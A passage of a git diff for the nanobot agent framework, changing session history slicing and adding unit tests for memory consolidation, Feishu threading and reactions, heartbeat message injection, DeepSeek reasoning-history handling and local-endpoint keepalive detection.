b/nanobot/session/manager.py @@ -46,10 +46,14 @@ class Session: unconsolidated = self.messages[self.last_consolidated:] sliced = unconsolidated[-max_messages:] - # Avoid starting mid-turn when possible. + # Avoid starting mid-turn when possible, except for proactive + # assistant deliveries that the user may be replying to. for i, message in enumerate(sliced): if message.get("role") == "user": - sliced = sliced[i:] + start = i + if i > 0 and sliced[i - 1].get("_channel_delivery"): + start = i - 1 + sliced = sliced[start:] break # Drop orphan tool results at the front. 
diff --git a/tests/agent/test_consolidation_ratio.py b/tests/agent/test_consolidation_ratio.py new file mode 100644 index 000000000..b1c95ec4b --- /dev/null +++ b/tests/agent/test_consolidation_ratio.py @@ -0,0 +1,108 @@ +"""Tests for configurable consolidation_ratio.""" + +from unittest.mock import AsyncMock, MagicMock + +import pytest +from pydantic import ValidationError + +import nanobot.agent.memory as memory_module +from nanobot.agent.loop import AgentLoop +from nanobot.bus.queue import MessageBus +from nanobot.config.schema import AgentDefaults +from nanobot.providers.base import GenerationSettings, LLMResponse + + +def _make_loop( + tmp_path, + *, + estimated_tokens: int = 0, + context_window_tokens: int = 200, + consolidation_ratio: float = 0.5, +) -> AgentLoop: + provider = MagicMock() + provider.get_default_model.return_value = "test-model" + provider.generation = GenerationSettings(max_tokens=0) + provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter") + _response = LLMResponse(content="ok", tool_calls=[]) + provider.chat_with_retry = AsyncMock(return_value=_response) + provider.chat_stream_with_retry = AsyncMock(return_value=_response) + + loop = AgentLoop( + bus=MessageBus(), + provider=provider, + workspace=tmp_path, + model="test-model", + context_window_tokens=context_window_tokens, + consolidation_ratio=consolidation_ratio, + ) + loop.tools.get_definitions = MagicMock(return_value=[]) + loop.consolidator._SAFETY_BUFFER = 0 + return loop + + +def _session_with_turns(loop: AgentLoop, *, turns: int): + session = loop.sessions.get_or_create("cli:test") + session.messages = [] + for i in range(turns): + session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) + session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"}) + loop.sessions.save(session) + return session + + +@pytest.mark.asyncio +@pytest.mark.parametrize( + ("ratio", "context_window_tokens", "estimates", "expected_archives"), + [ + (0.5, 200, [250, 90], 1), + (0.1, 1000, [1200, 800, 400, 50], 2), + (0.9, 200, [300, 175], 1), + ], +) +async def test_consolidation_ratio_controls_target( + tmp_path, + monkeypatch, + ratio: float, + context_window_tokens: int, + estimates: list[int], + expected_archives: int, +) -> None: + loop = _make_loop( + tmp_path, + context_window_tokens=context_window_tokens, + consolidation_ratio=ratio, + ) + loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + session = _session_with_turns(loop, turns=10) + + remaining_estimates = list(estimates) + + def mock_estimate(_session, *, session_summary=None): + assert session_summary is None + return (remaining_estimates.pop(0), "test") + + loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] + monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) + + await loop.consolidator.maybe_consolidate_by_tokens(session) + + assert loop.consolidator.archive.await_count == expected_archives + + +def test_ratio_propagated_from_config_schema() -> None: + defaults = AgentDefaults() + assert defaults.consolidation_ratio == 0.5 + + defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3}) + assert defaults.consolidation_ratio == 0.3 + + dumped = defaults.model_dump(by_alias=True) + assert dumped["consolidationRatio"] == 0.3 + + +def test_ratio_validation_rejects_out_of_range() -> None: + with pytest.raises(ValidationError): + 
AgentDefaults(consolidation_ratio=0.05) + + with pytest.raises(ValidationError): + AgentDefaults(consolidation_ratio=1.0) diff --git a/tests/channels/test_feishu_reaction.py b/tests/channels/test_feishu_reaction.py index 479e3dc98..68229e267 100644 --- a/tests/channels/test_feishu_reaction.py +++ b/tests/channels/test_feishu_reaction.py @@ -1,6 +1,6 @@ """Tests for Feishu reaction add/remove and auto-cleanup on stream end.""" from types import SimpleNamespace -from unittest.mock import AsyncMock, MagicMock, patch +from unittest.mock import AsyncMock, MagicMock import pytest @@ -160,19 +160,38 @@ class TestRemoveReactionAsync: class TestStreamEndReactionCleanup: + @pytest.mark.asyncio + async def test_stream_buffers_are_scoped_by_message_id(self): + ch = _make_channel() + ch._create_streaming_card_sync = MagicMock(return_value=None) + + await ch.send_delta( + "oc_chat1", "first", + metadata={"message_id": "om_first"}, + ) + await ch.send_delta( + "oc_chat1", "second", + metadata={"message_id": "om_second"}, + ) + + assert ch._stream_bufs["om_first"].text == "first" + assert ch._stream_bufs["om_second"].text == "second" + assert "oc_chat1" not in ch._stream_bufs + @pytest.mark.asyncio async def test_removes_reaction_on_stream_end(self): ch = _make_channel() ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf( text="Done", card_id="card_1", sequence=3, last_edit=0.0, ) + ch._reaction_ids["om_001"] = "rx_42" ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True)) ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True)) ch._remove_reaction = AsyncMock() await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"}, + metadata={"_stream_end": True, "message_id": "om_001"}, ) ch._remove_reaction.assert_called_once_with("om_001", "rx_42") @@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup: await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "reaction_id": "rx_42"}, + metadata={"_stream_end": True}, ) ch._remove_reaction.assert_not_called() diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 2ad466dcd..f7dc39e5d 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -3,7 +3,7 @@ import asyncio import json from pathlib import Path from types import SimpleNamespace -from unittest.mock import MagicMock, patch +from unittest.mock import AsyncMock, MagicMock, patch import pytest @@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage from nanobot.bus.queue import MessageBus from nanobot.channels.feishu import FeishuChannel, FeishuConfig - # --------------------------------------------------------------------------- # Helpers # --------------------------------------------------------------------------- -def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel: +def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel: config = FeishuConfig( enabled=True, app_id="cli_test", app_secret="secret", allow_from=["*"], reply_to_message=reply_to_message, + group_policy=group_policy, ) channel = FeishuChannel(config, MessageBus()) channel._client = MagicMock() @@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None: channel._client.im.v1.message.get.assert_not_called() assert len(captured) == 1 + + +# 
--------------------------------------------------------------------------- +# Session key derivation tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_session_key_group_with_root_id_is_thread_scoped() -> None: + """Group message with root_id gets a thread-scoped session key.""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id="om_root123", + message_id="om_child456", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key == "feishu:oc_abc:om_root123" + + +@pytest.mark.asyncio +async def test_session_key_group_no_root_id_uses_message_id() -> None: + """Group message without root_id gets session keyed by message_id (per-message session).""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key == "feishu:oc_abc:om_001" + + +@pytest.mark.asyncio +async def test_session_key_private_chat_no_override() -> None: + """Private chat never overrides session key (consistent with Telegram/Slack).""" + channel = _make_feishu_channel() + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="p2p", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key_override is None + + +# --------------------------------------------------------------------------- +# reply_in_thread tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_when_enabled() -> None: + """When reply_to_message is True, reply includes reply_in_thread=True.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = 
call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_without_reply_in_thread_when_disabled() -> None: + """When reply_to_message is False, reply does NOT use reply_in_thread.""" + channel = _make_feishu_channel(reply_to_message=False) + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + )) + + # No message_id in metadata → no reply attempt, direct create + channel._client.im.v1.message.create.assert_called_once() + + +@pytest.mark.asyncio +async def test_reply_keeps_fallback_when_reply_fails() -> None: + """Even with reply_to_message=True, fallback to create on reply failure.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = False + reply_resp.code = 99991400 + reply_resp.msg = "rate limited" + channel._client.im.v1.message.reply.return_value = reply_resp + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called() + channel._client.im.v1.message.create.assert_called() + + +@pytest.mark.asyncio +async def test_reply_no_reply_in_thread_for_p2p_chat() -> None: + """reply_in_thread should NOT be set for p2p chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", # p2p chats also use oc_ prefix + content="hello", + metadata={"message_id": "om_001", "chat_type": "p2p"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is not True + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_for_group_chat() -> None: + """reply_in_thread should be True for group chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001", "chat_type": "group"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_targets_message_id_when_in_topic() -> None: + """When inbound message is inside a topic (root_id != message_id), + the reply should target the inbound message_id (not root_id). 
+ The Feishu Reply API keeps the response in the same topic + automatically when the target message is already inside a topic.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={ + "message_id": "om_child456", + "chat_type": "group", + "root_id": "om_root123", + }, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + # Should reply to the inbound message_id, not the root + assert request.message_id == "om_child456" + assert request.request_body.reply_in_thread is True + + +def test_on_reaction_added_stores_reaction_id() -> None: + """_on_reaction_added stores the returned reaction_id in _reaction_ids.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result="reaction_abc")) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert channel._reaction_ids["om_001"] == "reaction_abc" + + +def test_on_reaction_added_skips_none_result() -> None: + """_on_reaction_added does not store None results.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result=None)) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert "om_001" not in channel._reaction_ids + + +def test_on_background_task_done_removes_from_set() -> None: + """_on_background_task_done removes task from tracking set.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + async def _fail(): + raise RuntimeError("test failure") + + task = loop.create_task(_fail()) + channel._background_tasks.add(task) + try: + loop.run_until_complete(task) + except RuntimeError: + pass # expected + channel._on_background_task_done(task) + finally: + loop.close() + + assert task not in channel._background_tasks diff --git a/tests/cli/test_commands.py b/tests/cli/test_commands.py index 2719beed1..8c86b32ac 100644 --- a/tests/cli/test_commands.py +++ b/tests/cli/test_commands.py @@ -8,6 +8,7 @@ from unittest.mock import AsyncMock, MagicMock, patch import pytest from typer.testing import CliRunner +from nanobot.agent.runtime import AgentRuntime from nanobot.bus.events import OutboundMessage from nanobot.cli.commands import _make_provider, app from nanobot.config.schema import Config @@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object: raise _StopGatewayError("stop") +def _test_agent_runtime(provider: object, config: Config) -> AgentRuntime: + return AgentRuntime( + provider=provider, + model=config.agents.defaults.model, + context_window_tokens=config.agents.defaults.context_window_tokens, + signature=("test",), + ) + + def _patch_cli_command_runtime( monkeypatch, config: Config, @@ -788,6 +798,8 @@ def _patch_cli_command_runtime( cron_service=None, get_cron_dir=None, ) -> None: + provider_factory = make_provider or (lambda _config: object()) + monkeypatch.setattr( "nanobot.config.loader.set_config_path", set_config_path or (lambda _path: None), @@ -800,7 +812,15 @@ def _patch_cli_command_runtime( ) monkeypatch.setattr( "nanobot.cli.commands._make_provider", - make_provider or (lambda _config: object()), + 
provider_factory, + ) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(provider_factory(_config), _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(provider_factory(config), config), ) if message_bus is not None: @@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config) monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None) monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(provider, _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(provider, config), + ) monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus) - monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object()) + + class _FakeSession: + def __init__(self) -> None: + self.messages = [] + + def add_message(self, role: str, content: str, **kwargs) -> None: + self.messages.append({"role": role, "content": content, **kwargs}) + + class _FakeSessionManager: + def __init__(self, _workspace: Path) -> None: + self.session = _FakeSession() + seen["session_manager"] = self + + def get_or_create(self, key: str) -> _FakeSession: + seen["session_key"] = key + return self.session + + def save(self, session: _FakeSession) -> None: + seen["saved_session"] = session + + monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager) class _FakeCron: def __init__(self, _store_path: Path) -> None: @@ -1030,6 +1078,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( content="Time to stretch.", ) ) + assert seen["session_key"] == "telegram:user-1" + saved_session = seen["saved_session"] + assert isinstance(saved_session, _FakeSession) + assert saved_session.messages == [ + { + "role": "assistant", + "content": "Time to stretch.", + "_channel_delivery": True, + } + ] def test_gateway_cron_job_suppresses_intermediate_progress( @@ -1052,6 +1110,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress( monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config) monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None) monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object()) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(object(), _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(object(), config), + ) monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus) monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object()) diff --git a/tests/heartbeat/test_heartbeat_context_bridge.py b/tests/heartbeat/test_heartbeat_context_bridge.py new file mode 100644 index 000000000..5ec02a8bb --- /dev/null +++ b/tests/heartbeat/test_heartbeat_context_bridge.py @@ -0,0 +1,120 @@ +"""Tests for heartbeat context bridge — injecting delivered messages into channel session.""" + +from nanobot.session.manager import SessionManager + + +class TestHeartbeatContextBridge: + """Verify that on_heartbeat_notify injects the assistant 
diff --git a/tests/heartbeat/test_heartbeat_context_bridge.py b/tests/heartbeat/test_heartbeat_context_bridge.py
new file mode 100644
index 000000000..5ec02a8bb
--- /dev/null
+++ b/tests/heartbeat/test_heartbeat_context_bridge.py
@@ -0,0 +1,120 @@
+"""Tests for heartbeat context bridge — injecting delivered messages into channel session."""
+
+from nanobot.session.manager import SessionManager
+
+
+class TestHeartbeatContextBridge:
+    """Verify that on_heartbeat_notify injects the assistant message into the
+    channel session so user replies have conversational context."""
+
+    def test_notify_injects_into_channel_session(self, tmp_path):
+        """After notify, the target channel session should contain the
+        heartbeat response as an assistant turn."""
+        session_mgr = SessionManager(tmp_path / "sessions")
+        target_key = "telegram:12345"
+
+        # Simulate: session exists with one user message
+        target_session = session_mgr.get_or_create(target_key)
+        target_session.add_message("user", "hello earlier")
+        session_mgr.save(target_session)
+
+        # Simulate what on_heartbeat_notify does
+        target_session = session_mgr.get_or_create(target_key)
+        target_session.add_message(
+            "assistant",
+            "3 new emails — invoice, meeting, proposal.",
+            _channel_delivery=True,
+        )
+        session_mgr.save(target_session)
+
+        # Reload and verify
+        reloaded = session_mgr.get_or_create(target_key)
+        messages = reloaded.get_history(max_messages=0)
+        roles = [m["role"] for m in messages]
+        assert roles == ["user", "assistant"]
+        assert "3 new emails" in messages[-1]["content"]
+
+    def test_reply_after_injection_has_context(self, tmp_path):
+        """Simulates the full flow: prior conversation exists, heartbeat
+        injects, then user replies. The session should have the heartbeat
+        message visible in get_history so the model sees the context."""
+        session_mgr = SessionManager(tmp_path / "sessions")
+        target_key = "telegram:12345"
+
+        # Pre-existing conversation (user has chatted before)
+        session = session_mgr.get_or_create(target_key)
+        session.add_message("user", "Hey")
+        session.add_message("assistant", "Hi there!")
+        session_mgr.save(session)
+
+        # Step 1: heartbeat injects assistant message
+        session = session_mgr.get_or_create(target_key)
+        session.add_message(
+            "assistant",
+            "If you want, I can mark that email as read.",
+            _channel_delivery=True,
+        )
+        session_mgr.save(session)
+
+        # Step 2: user replies "Sure"
+        session = session_mgr.get_or_create(target_key)
+        session.add_message("user", "Sure")
+        session_mgr.save(session)
+
+        # Verify: get_history includes the heartbeat injection
+        reloaded = session_mgr.get_or_create(target_key)
+        history = reloaded.get_history(max_messages=0)
+        roles = [m["role"] for m in history]
+        assert roles == ["user", "assistant", "assistant", "user"]
+        assert "mark that email" in history[2]["content"]
+        assert history[3]["content"] == "Sure"
+
+    def test_injection_does_not_duplicate_on_existing_history(self, tmp_path):
+        """If the channel session already has messages, the injection
+        appends cleanly without corruption."""
+        session_mgr = SessionManager(tmp_path / "sessions")
+        target_key = "telegram:12345"
+
+        # Pre-existing conversation
+        session = session_mgr.get_or_create(target_key)
+        session.add_message("user", "What time is it?")
+        session.add_message("assistant", "It's 2pm.")
+        session.add_message("user", "Thanks")
+        session_mgr.save(session)
+
+        # Heartbeat injects
+        session = session_mgr.get_or_create(target_key)
+        session.add_message(
+            "assistant",
+            "You have a meeting in 30 minutes.",
+            _channel_delivery=True,
+        )
+        session_mgr.save(session)
+
+        # Verify
+        reloaded = session_mgr.get_or_create(target_key)
+        history = reloaded.get_history(max_messages=0)
+        roles = [m["role"] for m in history]
+        assert roles == ["user", "assistant", "user", "assistant"]
+        assert "meeting in 30 minutes" in history[-1]["content"]
+
+    def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path):
+        """A user replying to the first delivered message still sees that context."""
+        session_mgr = SessionManager(tmp_path / "sessions")
+        target_key = "telegram:99999"
+
+        session = session_mgr.get_or_create(target_key)
+        session.add_message(
+            "assistant",
+            "Weather alert: sandstorm expected at 4pm.",
+            _channel_delivery=True,
+        )
+        session.add_message("user", "Sure")
+        session_mgr.save(session)
+
+        reloaded = session_mgr.get_or_create(target_key)
+        history = reloaded.get_history(max_messages=0)
+        assert len(history) == 2
+        assert history[0]["role"] == "assistant"
+        assert "sandstorm" in history[0]["content"]
+        assert history[1] == {"role": "user", "content": "Sure"}
diff --git a/tests/providers/test_litellm_kwargs.py b/tests/providers/test_litellm_kwargs.py
index dfa0f58ac..1c3cfb851 100644
--- a/tests/providers/test_litellm_kwargs.py
+++ b/tests/providers/test_litellm_kwargs.py
@@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None:
     assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
 
 
+def _deepseek_kwargs(messages: list[dict]) -> dict:
+    with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
+        provider = OpenAICompatProvider(
+            api_key="sk-test",
+            default_model="deepseek-v4-flash",
+            spec=find_by_name("deepseek"),
+        )
+
+    return provider._build_kwargs(
+        messages=messages,
+        tools=None,
+        model="deepseek-v4-flash",
+        max_tokens=1024,
+        temperature=0.7,
+        reasoning_effort="high",
+        tool_choice=None,
+    )
+
+
+def _tool_call(call_id: str) -> dict:
+    return {
+        "id": call_id,
+        "type": "function",
+        "function": {"name": "my", "arguments": "{}"},
+    }
+
+
+def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None:
+    kwargs = _deepseek_kwargs([
+        {"role": "system", "content": "system"},
+        {"role": "user", "content": "can we use wechat?"},
+        {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
+        {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
+        {"role": "user", "content": "continue"},
+    ])
+
+    assert kwargs["messages"] == [
+        {"role": "system", "content": "system"},
+        {"role": "user", "content": "continue"},
+    ]
+
+
+def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None:
+    kwargs = _deepseek_kwargs([
+        {"role": "user", "content": "can we use wechat?"},
+        {
+            "role": "assistant",
+            "content": "",
+            "reasoning_content": "I should inspect supported channels.",
+            "tool_calls": [_tool_call("call_good")],
+        },
+        {"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"},
+        {"role": "user", "content": "continue"},
+    ])
+
+    assistant = kwargs["messages"][1]
+    assert assistant["role"] == "assistant"
+    assert assistant["reasoning_content"] == "I should inspect supported channels."
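The three DeepSeek tests pin down a history-sanitisation rule for thinking models: an assistant tool-call turn with no reasoning_content is dropped along with its tool results; if a later user turn exists, the user message that opened the bad exchange is dropped too, otherwise it is kept so the model can retry it. A standalone approximation of that rule, written only from the expected inputs and outputs above (the real logic presumably lives in OpenAICompatProvider._build_kwargs and may differ in structure):

    def sanitize_deepseek_thinking_history(messages: list[dict]) -> list[dict]:
        """Illustrative only: reproduces the behaviour the three tests above assert."""
        bad_assistant_idx = [
            i for i, m in enumerate(messages)
            if m.get("role") == "assistant" and m.get("tool_calls") and not m.get("reasoning_content")
        ]
        drop: set[int] = set()
        for i in bad_assistant_idx:
            drop.add(i)  # drop the assistant tool-call turn itself
            bad_ids = {call["id"] for call in messages[i]["tool_calls"]}
            for j in range(i + 1, len(messages)):
                if messages[j].get("role") == "tool" and messages[j].get("tool_call_id") in bad_ids:
                    drop.add(j)  # drop the orphaned tool results
            # With a follow-up user turn the whole bad exchange is discarded, including the
            # user message that started it; without one, that user message is kept for a retry.
            if any(m.get("role") == "user" for m in messages[i + 1:]):
                for j in range(i - 1, -1, -1):
                    if messages[j].get("role") == "user":
                        drop.add(j)
                        break
        return [m for i, m in enumerate(messages) if i not in drop]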
+    assert kwargs["messages"][2]["role"] == "tool"
+
+
+def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None:
+    kwargs = _deepseek_kwargs([
+        {"role": "system", "content": "system"},
+        {"role": "user", "content": "can we use wechat?"},
+        {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
+        {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
+    ])
+
+    assert kwargs["messages"] == [
+        {"role": "system", "content": "system"},
+        {"role": "user", "content": "can we use wechat?"},
+    ]
+
+
 def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
     with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
         provider = OpenAICompatProvider()
diff --git a/tests/providers/test_local_endpoint_detection.py b/tests/providers/test_local_endpoint_detection.py
new file mode 100644
index 000000000..fe45b90aa
--- /dev/null
+++ b/tests/providers/test_local_endpoint_detection.py
@@ -0,0 +1,118 @@
+"""Tests for _is_local_endpoint detection and keepalive configuration."""
+
+from unittest.mock import MagicMock
+
+from nanobot.providers.openai_compat_provider import (
+    OpenAICompatProvider,
+    _is_local_endpoint,
+)
+
+
+def _make_spec(is_local: bool = False) -> MagicMock:
+    spec = MagicMock()
+    spec.is_local = is_local
+    return spec
+
+
+class TestIsLocalEndpoint:
+    """Test the _is_local_endpoint helper."""
+
+    def test_spec_is_local_true(self):
+        assert _is_local_endpoint(_make_spec(is_local=True), None) is True
+
+    def test_spec_is_local_false_no_base(self):
+        assert _is_local_endpoint(_make_spec(is_local=False), None) is False
+
+    def test_no_spec_no_base(self):
+        assert _is_local_endpoint(None, None) is False
+
+    def test_localhost(self):
+        assert _is_local_endpoint(None, "http://localhost:1234/v1") is True
+
+    def test_localhost_https(self):
+        assert _is_local_endpoint(None, "https://localhost:8080/v1") is True
+
+    def test_loopback_127(self):
+        assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True
+
+    def test_private_192_168(self):
+        assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True
+
+    def test_private_10(self):
+        assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True
+
+    def test_private_172_16(self):
+        assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True
+
+    def test_private_172_31(self):
+        assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True
+
+    def test_not_private_172_32(self):
+        assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False
+
+    def test_docker_internal(self):
+        assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True
+
+    def test_ipv6_loopback(self):
+        assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True
+
+    def test_public_api(self):
+        assert _is_local_endpoint(None, "https://api.openai.com/v1") is False
+
+    def test_openrouter(self):
+        assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False
+
+    def test_spec_overrides_public_url(self):
+        """spec.is_local=True takes precedence even with a public-looking URL."""
+        assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True
+
+    def test_case_insensitive(self):
+        assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True
+
+    def test_trailing_slash(self):
+        assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True
+
+    def test_public_hostname_containing_localhost_is_not_local(self):
+        assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False
+
+    def test_public_hostname_containing_private_ip_prefix_is_not_local(self):
+        assert _is_local_endpoint(None, "https://api10.example.com/v1") is False
+
+    def test_url_without_scheme(self):
+        assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True
+
+
+class TestLocalKeepaliveConfig:
+    """Verify that local endpoints get keepalive_expiry=0."""
+
+    def test_local_spec_disables_keepalive(self):
+        spec = _make_spec(is_local=True)
+        spec.env_key = ""
+        spec.default_api_base = "http://localhost:11434/v1"
+        provider = OpenAICompatProvider(
+            api_key="test", api_base="http://localhost:11434/v1", spec=spec,
+        )
+        pool = provider._client._client._transport._pool
+        assert pool._keepalive_expiry == 0
+
+    def test_lan_ip_disables_keepalive(self):
+        """A generic 'openai' spec with a LAN IP should still disable keepalive."""
+        spec = _make_spec(is_local=False)
+        spec.env_key = ""
+        spec.default_api_base = None
+        provider = OpenAICompatProvider(
+            api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec,
+        )
+        pool = provider._client._client._transport._pool
+        assert pool._keepalive_expiry == 0
+
+    def test_cloud_keeps_default_keepalive(self):
+        spec = _make_spec(is_local=False)
+        spec.env_key = ""
